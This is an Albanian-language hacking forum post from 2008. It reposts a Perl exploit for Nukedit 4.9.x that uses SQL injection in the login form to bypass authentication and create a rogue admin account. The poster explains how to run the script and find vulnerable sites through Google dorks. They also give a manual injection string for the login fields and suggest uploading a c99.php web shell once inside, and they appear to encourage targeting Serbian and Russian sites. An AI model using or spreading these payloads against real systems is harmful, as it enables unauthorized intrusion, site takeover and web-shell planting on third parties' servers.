p!rAt-xXx
Webmaster
Numri i postimeve : 232
Location : System32
Job/hobbies : HaCk3r iN kOsoVA
Registration date : 04/02/2008
 | Titulli: Nukedit 4.9.x Remote Create Admin Exploit  Fri Mar 07, 2008 1:38 am | |
| Nukedit 4.9.x Remote Create Admin Exploit Cito: #!/usr/bin/perl##############################################
##############Title: Nukedit 4.9.x Create Admin Exploit ## ##Credit:
r3dm0v3 ## http://r3dm0v3.persianblog.ir
## r3dm0v3[4t]yahoo[dot]com ## Tehran - Iran ## ##Download: http://www.nukedit.com/content/Download.asp
##Vulnerables: 4.9.x, prior versions maybe affected. ##Remote: Yes
##Dork: "Powered by Nukedit" ##Fix: Not Available
################################################## ##########use
LWP::UserAgent;use HTTP::Cookies;$host = $ARGV[0];if
(substr($host,length($host)-1,1) ne "/"){ $host.="/";}$usrmail =
$ARGV[1];$passwd = $ARGV[2];$url = "http://".$host;$usrSQL= "' union
select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737
e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,
12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x";&Banner();if
(@ARGV < 3) {&Usage();exit(1);}print "[~] Host: $host \n";print
"[~] Email/Password: $usrmail/$passwd\n";print "[~] Logging
in...\n";$xpl = LWP::UserAgent->new() || die;$cookie_jar =
HTTP::Cookies->new();$xpl->cookie_jar( $cookie_jar );$res =
$xpl->post($url.'utilities/login.asp',Content => ["redir" =>
"/nukedit/default.asp","email" => "$usrSQL","password" =>
"r3dm0v3","savepassword" => "false","submit" => "Login",],);if
($res->content =~ /Object Moved/){ print "[+] Logged in\n";}else{
print "[-] Can not login!\n"; exit();}print "[~] Creating
Admin...\n";$res = $xpl->post($url.'utilities/useradmin.asp',Content
=> ["action" => "addDB","username" => "r3dm0v3","company"
=> "red move","url" => "http://r3dm0v3.persianblog.ir","address"
=> "a","county" => "b","zip" => "666","country" =>
"Iran","phone" => "66666666","fax" => "12345678","email" =>
"$usrmail","password" => "$passwd","groupid" => "1","submit1"
=> "Add User >>","IP" => "127.0.0.2",],);if
($res->content =~ /Object Moved/){ print "[+] Admin added. Login
info:\n". " email: $usrmail\n". " password: $passwd\n";}else{ print
"[-] Exploit failed!\n"; print $res->content;}sub Banner{print
"################################################# ###########\n". "#
Nukedit 4.9.x Create Admin Exploit #\n". "# by r3dm0v3 #\n". "#
r3dm0v3[4t]yahoo[.]com #\n". "# http://r3dm0v3.persianblog.ir
#\n". "#################################################
###########\n";}sub Usage(){print "\n Usage: nukedit.pl
<host&path> <email> <password>\n";print " ex. :
nukedit.pl site.com/nukedit/ myname\@somewhere.com 123456\n";}#
milw0rm.com [2008-02-26] | Per te Hapur Ket Exploit duhet te keni Prelin te Instaluar.pra shum thjesht eshte  se pari Exploitin qe eshte me nalt e beni copy dhe e qitni
ne Notepad dhe e beni sava as psh: hack.pl pra e ruani me nje
emer qe doni dhe me mbares .pl
pastaj e qitni ne C:/
dhe hym ne Start , Run, dhe CMD
dhe shkruajm kshtu: cd\ dhe enter
pastaj e shkruajm emrin e exploitit un e morra shembull hack.pl
dhe psh kshtu: Kodi: hack.pl emriivebsajtit.com/ emalijot@hotmail.com 123456 dhe pastaj Enternqoft se kemi fat krijohet Admini dhe mund te Logiratesh dhe
pastaj eshte ne doren tendeSi te kerkosh ne Google.com:dhe Pastaj merrni nje link dhe veproni si me nalt. Kodi: "Powered by Nukedit" Ose
Kodi: inurl:utilities/login.asp Mir, tash edhe nje metod tjeter pa pl  se pritoni ( apo se keni te instaluar )
Kodi: #Title: Nukedit 4.9.x Login Bypass SQL injection # #Discovered By: r3dm0v3 # http://r3dm0v3.persianblog.ir # r3dm0v3( 4t ) yahoo [dot] com # Tehran - Iran # #Download: http://www.nukedit.com/content/Download.asp #Vulnerables: 4.9.x, prior versions maybe vulnerable #Remote: Yes #Dork: "Powered by Nukedit" # inurl:utilities/login.asp #Fix: Not Available #POC: #goto http://target.com/[path_to_nukedit]/utilities/login.asp and fill login fields as below: #Email: ' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x #Password: r3dm0v3 #Click Login and you will get in as an admin. #There some other sql injections in other pages. Kjo edhe me e leht kerkoni njejt ne google.com hini te ndonjera faqe
dhe pastaj shkoni Login, nqoft se nuk e ka mund te ja shtojsh psh:
Kodi: http://websajti.com/utilities/login.asp dhe pastaj tek Email: ja jep ket kod psh: Kodi: Email: ' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x Password: r3dm0v3 Login dhe Pastaj hini ne admin beni qka te duni  veq mos ja prishni
dhe diqka nqoft se i hini ndonje websajti mund ta shfytzoni per veti:
Kodi: www.faqja.com/filemanager dhe pastaj aty e uplodon phpmailerin ose c99.php shellin per te ber qka te duni etj.
Besoj se keni kuptuar eshte thjesht shum, por ka te hackerume shum
po ju hini persdyt 
ajt me te mira Nqoft se deiqka skeni kuptuar vetem pyetni
dhe kqyrni ma shum faqe te Serbve dhe Rusve | |
|
Forum 